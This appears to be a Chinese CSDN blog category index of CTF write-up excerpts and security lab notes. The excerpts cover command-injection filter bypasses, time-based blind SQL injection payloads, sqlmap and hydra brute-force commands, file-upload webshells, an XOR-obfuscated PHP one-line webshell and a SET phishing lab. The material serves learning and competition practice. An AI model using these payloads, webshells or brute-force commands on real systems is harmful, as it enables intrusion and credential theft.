![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
一些CTF的比赛总结的wp以及在CTF的道路上的学习记录
K—C
闻道有先后,术有人有专攻,如是而已。
展开
-
AWCTF萌新赛web题WP
web1、pacman一个游戏,看到题目直接看网页源代码因为不能邮右键,所以直接在view-source:加网址view-source:http://49.232.149.138:11521/pacman/看到两个js文件,都打开在index.js中发现flagbase64解密然后将解密出来的那个js代码放入控制台中,然后能出来flag...原创 2020-12-05 20:38:30 · 786 阅读 · 3 评论 -
祥云杯--Command
命令执行漏洞尝试127.0.0.2|ls(|:无论左边是false还是true,右边都会执行)发现了文件夹下有index.php,我们首先需要把它读出来(题目过滤了空格还有cat命令,也过滤了index和php字符串)我们尝试收发现可以用c\a\t ind\e\x p\h\p来代替空格可以用<或者%09来代替burpsuite下可用%09(浏览器下可能不成功)由indexelse if(preg_match("/.*f.*l.*a.g./", $ip)){flag可能是..原创 2020-11-23 14:10:48 · 405 阅读 · 1 评论 -
第三届信息安全铁人三项第二赛区部分wp
为啥是部分wp呢。。。还不是因为太菜了。。。企业环境渗透进去看到主页搜索一下信息,发现有一个用户信息的文件下载下来,几行没用的信息,随便点了几下,发现flag4主页有一个文件上传的点,先不考虑,一般主页安全都做得比较好,最后再看然后御剑扫一下发现一个test目录,访问又一个文件上传,这个测试安全防护可能比较差,写个一句话上传上传点没有任何防护,上传成功蚁剑连接在根目录发现flag5剩下的因水平问题没有做出来,当时比赛事用nmap扫描端口发现开放了ssh,3389远程桌面原创 2020-11-14 15:07:14 · 1011 阅读 · 0 评论 -
基于SQLI的SQL时间盲注
第一步 判断注入点与注入类型?id=1’ and sleep(10) %23对比没有使用sleep()函数时的状态如下:下面基于时间盲注进行数据库信息获取第二步 获取数据库长度id=1’ and if((length(database())=8),1,sleep(5)) %23判断得数据库长度为8第三步探测数据库其他信息(1)判断数据库名?id=1’ and if(ascii(substr(database(),1,1)=115,1,sleep(5))–+数据库名的第一个字母为s原创 2020-08-27 12:42:54 · 393 阅读 · 0 评论 -
第四届“强网杯”全国网络安全挑战赛部分WP
主动题目如下: <?phphighlight_file("index.php");if(preg_match("/flag/i", $_GET["ip"])){ die("no flag");}system("ping -c 3 $_GET[ip]");?> 先用一个ls命令尝试一下回显只要读出flag.php即可得到flag而题目的代码有正则过滤flag这里用到模糊查询即可得到flagFunhash题目代码如下<?phpinclude原创 2020-08-24 14:27:21 · 788 阅读 · 1 评论 -
sql文件头注入
实验原理1.常见的HTTP请求头有:(1)HostHost请求报头域主要用于指定被请求资源的Internet主机和端口号。 如:Host: localhost:8088(2)User-AgentUser-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时,很多时候都可以见到显示我们的浏览器、系统信息,这些都是此头的作用。 如:User-Agent: Mozilla/5.0(3)RefererReferer包含一个URL,代表当前访问URL的上一个URL,也原创 2020-08-21 15:04:51 · 407 阅读 · 0 评论 -
基于SQLI的POST字符型SQL注入
实验原理1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。2.GET和POST的区别:语义上的区别,get用于获取数据,post用于提交数据。GET - 从指定的资源请求数据。POST - 向指定的资源提交要被处理的数据get参数有长度限制(受限于url长度,具体的数值取决于浏览器和服务器的限制),而post无限制3.如何判断是否存在POST注入主要是判断输入框是否存在注入,直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),原创 2020-08-21 12:11:49 · 363 阅读 · 0 评论 -
sqlmap应用之cookie参数
访问dvwa,将级别调为low步骤一:如果不带入cookie参数,直接sqlmap查询失败SQLMAP直接使用url来进行注入,因为之前没有登录DVWA所以被重定向到login.php界面,直接注入失败步骤二:使用burpsuit抓包工具,在sql注入菜单处提交参数请求时进行数据抓包,获取cookies值用通用的url请求,在burp里面进行抓包,信息如图,已经获取了cookie值发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据查找所有数据库查找cms数据库下的表原创 2020-08-21 11:11:07 · 4574 阅读 · 0 评论 -
基于phpcms的sqlmap工具注入
SQL注入攻击是一种常用的攻击网站手段。受影响的网站系统: ASP+Access、ASP+SQLServer、PHP+MySQL、PHP+Apache等。实验原理SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。SQLMAP支持五种SQL注入技术:(1)基于布尔值得注入,基于时间的盲注,基于错误的盲注,UNION查询和s原创 2020-08-20 22:33:46 · 567 阅读 · 0 评论 -
基于phpcms的SQL手工注入
步骤一:探测目标网站有无sql注入点试探目标网站 分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。and 1=1and 1=2发现不需要闭合但引号,判断为注入类型为整数型第一次加单引号时,发生报错,发现了数据库类型为mysql步骤二、判断字段长度利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15判断字段为15个步骤三、判断字段原创 2020-08-20 13:31:10 · 493 阅读 · 0 评论 -
Nmap扫描与RDP连接实验
一般而言,一个完整的网络安全扫描过程通常可以分为三个阶段:(1)发现目标主机或网络。(2)在发现活动目标后进一步搜集目标信息,包括对目标主机运行的操作系统类型进行识别,通过端口扫描技术可以查看该系统处于监听或运行状态的服务以及服务软件的版本等。如果目标是一个网络,还可以进一步发现该网络拓扑结构、路由设备以及主机信息。(3)根据搜集到的信息进行相关处理,进而检测出目标系统存在的安全漏洞。用nmap命令进行端口扫描查看扫描出来的系统开放端口情况,如上图所示。可见远程被扫描主机开启了3389端口。本原创 2020-08-04 15:56:14 · 1154 阅读 · 0 评论 -
hydra暴力破解实验
实验原理理论上只要是登录的地方,都可以进行暴力破解。虽然有的登录加入了验证码,但仍然有针对验证码的暴力破解。hydra支持常见的登录方式,如ssh ftp http mysql vnc 等协议。暴破httphydra -L user.txt -P passwd.txt x.x.x.x http-get暴破sshhydra -L user.txt -P passwd.txt x.x.x.x ssh暴破ftphydra -L user.txt -P passwd.txt x.x.x.x ft原创 2020-08-03 20:57:23 · 677 阅读 · 0 评论 -
iscc2020WEB题WP
web4打开题目,没啥发现,抓包看一下一看到Cookie: token=,应该是伪造jwt原创 2020-05-26 16:12:11 · 1259 阅读 · 0 评论 -
网鼎杯2020Crypto题boom
打开题目,发现是一个exe文件,果断ida打开发现是一个算法,然后得到flag__main(); menu(); system("pause"); system("cls"); v7 = 70; v8 = 229; v9 = 239; v10 = 230; v11 = 22; v12 = 90; v13 = 90; v14 = 251; v15 = 54; v16 = 18; v17 = 23; v18 = 68; v19 = 106;.原创 2020-05-10 20:01:07 · 821 阅读 · 6 评论 -
闻道计算机协会CTF萌新赛-隐写术
图片隐写打开附件是一张png文件看图片黑黑绿绿的,又因为题目是隐写题的原因,猜测是LSB(有效最低位)隐写图片中的像素一般是由三种颜色构成,即三原色(绿红蓝),由这三种颜色可以组成其它各种颜色我们使用StegSolve进行分析...原创 2020-04-15 13:24:26 · 377 阅读 · 0 评论 -
闻道计算机协会CTF萌新赛-WEB
web一共五道,我乱序分析web1看题目提示,PUT your heart into this page.盲猜是个脑洞题用put传入参数heart纠结了一下午,有时候萌新题就是看脑洞web2这个题是个代码审计题查看源码,发现 extract($_GET) 一行将 get 参数转化为 php 变量.下一行判断 $who 是 web1n,并且 $girlfriend 存在的话就输...原创 2020-04-15 11:23:55 · 1007 阅读 · 4 评论 -
记一次命令执行漏洞的绕过姿势
在一个CTF平台上发现了一个命令执行的题目题目源代码如下:<?phpif(isset($_REQUEST['ip'])) { $target = trim($_REQUEST['ip']); $substitutions = array( '&' =>'', ';' =>'', '|' =>'',...原创 2020-04-11 11:26:27 · 2555 阅读 · 0 评论 -
变种一句话木马
墨者学院有一道例题我们打开网站发现了一串php代码<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>看着很乱里面用了好多异或运算,但我们只需要打印出...原创 2020-04-04 21:43:54 · 931 阅读 · 0 评论 -
内部文件上传系统漏洞分析溯源(墨者学院)
很简单的一个文件上传漏洞,我去学到了不一样的知识实训目标1、熟悉常见中间件存在的解析漏洞;2、熟悉一句话木马的使用与制作3、熟悉常见的上传漏洞利用方法解题方向1、试探允许上传的文件类型2、观察服务器在处理完上传任务后返回的内容,获取上传路径3、尝试修改上传路径,观察服务器是否允许写入权限题目底下的神评论1、目录解析、以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。...原创 2020-03-28 22:13:37 · 354 阅读 · 0 评论 -
功放世界web新手练习区wp
第一题发现不可右键查看源代码,直接F12找到flag第二题题目描述可知应该是信息泄露类,并且应该是robots泄露我们在URL后面添加上robots.txt找到提示我们将URL添加f1ag_1s_h3re.php即可找到了flag第三题分析题目提示,应该是备份文件泄露有关的题目看提示,我们应该想到index.php备份文件泄露有几个常用的备份文件名.bak就是其一...原创 2020-03-18 17:21:25 · 830 阅读 · 0 评论 -
xampp下搭建Sql-labs靶场
安装好xampp,如果未安装,可阅读我的博客https://editor.csdn.net/md/?articleId=104481126将Sql-labs的文件夹拷贝在xampp中的htdocs下为了更好便捷的访问,我将sqli-labs改为sqli打开sqli文件中的sql-connections下的db-creds.inc将本机中的数据库信息填写保存由db-creds.inc...原创 2020-03-17 14:24:03 · 791 阅读 · 0 评论 -
渗透测试工具-SET工具使用-钓鱼网站实验
记一次360实训平台的实验渗透测试工具-SET工具使用-钓鱼网站实验实验目的通过本实验理解社工平台SET的模块组成及功能,掌握利用SET软件配置钓鱼网站的方法与过程,熟悉常见社工场景的安全防护测量。实验原理开源的社会工程学利用套件SET,能够支持鱼叉式网络钓鱼攻击、网页攻击、传染媒介式(俗称木马)、建立payloaad和listener、邮件群发攻击、Arduino基础攻击、无线接入点攻...原创 2020-03-16 11:39:02 · 1692 阅读 · 3 评论 -
CTF——杂项之千层套路
记一下一个特别有意思的杂项题,题不难,蛮有趣,而且主要是考察了一些基本的初级杂项套路将附件下载后添加.mp3后缀,发现是一首歌看到上面有一个hintbase64加密将base64解密KEY{You_are_stupid}我一开始只是以为出题者只是想稍微骚一下,让你知道你的思路有问题,如果你也这么以为那就真的是愚蠢我就愚蠢了,出题人的心理学有点东西划重点这个KEY很重要我们...原创 2020-03-05 12:37:39 · 1345 阅读 · 1 评论 -
CTF——图片的隐写(修改图片宽高显示隐藏文字)
ctf中入门的杂项有一种是图片的隐写来隐藏flag我们可看看出,图片的下半部分有一行字母,只漏出了字母的头部。我们按套路先看图片的属性图像的尺寸是198*104我们用winhex打开图片如若还想深入学习数据代表的意义,可以百度一下png图像文件格式十六进制的C6为十进制的198十六进制的68为十进制的104我们把高跟宽改成同一大小保存数据再打开图片看到flag...原创 2020-03-04 10:54:47 · 6713 阅读 · 5 评论 -
xampp下搭建DVWA靶场
安装好xampp,如果未安装,可阅读我的博客https://editor.csdn.net/md/?articleId=104481126将dvwa的文件夹拷贝在xampp中的htdocs下打开DVWA中的config中的config.inc.php(若没有则将config.inc.php.dist备份后改为config.inc.php)将这里修改为你数据库的账号及密码xampp刚下载...原创 2020-02-24 21:49:52 · 498 阅读 · 0 评论 -
xampp环境的搭建
如果大家想要在本地搭建一个网站环境,肯定需要一个集成软件XAMPP是Apache+MariaDB+PHP+Perl的集成软件我们此次在win7环境下搭建双击安装会出现一个错误这是正常现象点击OK进行下一步一路点击next,注意看好你要安装的路径安装完成后选择语言开启apache跟mysql的开关验证环境是否搭建成功正常开启在浏览器上访问网址127.0.0.1出现这个...原创 2020-02-24 20:38:17 · 202 阅读 · 0 评论 -
HGAME2020第一周WEB小白视角解题
Cosmos 的博客看题目没啥有用的信息打开网页之后发现了版本管理工具以及GitHub字样,盲猜跟github源码泄露类似先实试了试/.git无果,又试了试/.git/config出来了github的地址直接访问地址点击init找到了存放flag的地方flag是base64加密过的,解密即可hgame{g1t_le@k_1s_danger0us_!!!}接 头 霸 王...原创 2020-02-13 20:13:23 · 1133 阅读 · 0 评论 -
burp suite如何抓取HTTPS协议的数据包
今天用burpsuite抓取一个https网站发现抓取不了之前弄过一次,现在换电脑了又要重新弄一次首先访问http://burp很多童鞋打不开这个网站,我也一度以为要那啥才能打开,后来发现只需要开代理一下就可以打开,如图下:找到证书下载的位置,然后打开火狐的选项功能,搜索证书查看证书导入证书即可...原创 2020-02-08 19:54:50 · 886 阅读 · 0 评论 -
HGAME2020第一周杂项题——签到题ProPlus
打开压缩文件后发现里面有个加密的zip文件跟一个txt文件按照下面的提示将英文句子解密后发现刚好是《百年孤独》中的一句话,将中间的大写字母按照提示进行解密三次栅栏https://www.qqxiuzi.cn/bianma/zhalanmima.php五次凯撒https://www.qqxiuzi.cn/bianma/kaisamima.php将ok.zip解密后发现是ok加密...原创 2020-01-29 15:25:04 · 1137 阅读 · 0 评论 -
HGAME2020第一周杂项题——克苏鲁神话
说实话,我现在也搞不懂这hint有啥用。。。。。解压出附件,里面有一个txt和一个zip,zip是加密的发现了加密压缩包里有一个文件也为Bacon.txt到这里,应该是zip的明文攻击将txt压缩成zip打开word文件发现还有密码。。。。。bacon.txt提示我们要想到培根加密在线网站:https://tool.bugku.com/peigen/将密码输入后打开...原创 2020-01-29 14:54:46 · 415 阅读 · 0 评论 -
HGAME2020第一周杂项题——壁纸
下载附件解压后发现是一个张图片百度了一下pixiv,是个图片网站,国外的,需要科学上网才能访问将图片用记事本的方式打开发现最后一行有提示密码是图片的ID,然后大致可以猜出这张图片是一个压缩包,将后缀改为zip压缩去P站上搜索到了图片的ID76953815去在线网站解一下的到flaghttp://www.jsons.cn/unicode/hgame{Do_y0u_KnO...原创 2020-01-29 15:01:28 · 454 阅读 · 0 评论 -
HGAME2020第一周杂项题——欢迎参加HGame!
看题可知是base64编码,在线网站解密:https://base64.supfree.net/建议将空格改成/在在线网站在线解密莫尔斯http://www.atool9.com/morse.php原创 2020-01-29 14:10:26 · 1051 阅读 · 0 评论 -
HGAME第一周杂项题——每日推荐
这一题是在看到官方的wp之后才选择学习复现一下的。。本人比较浮躁,所以年前没有看这一道题。本着小白学习的精神来跟大家分享一下这个题的做题步骤。下载下附件发现是一个抓取流量的题目,用wirshark打开后先过滤掉只剩下http的流量,但数据还是好多,在官方wp的指导下,发现有一个异常大的表单。将表单save成文件后放入winhex中分析看到PK字样判断是个压缩包,先把前面的数据删除掉(之...原创 2020-01-29 13:53:44 · 1434 阅读 · 0 评论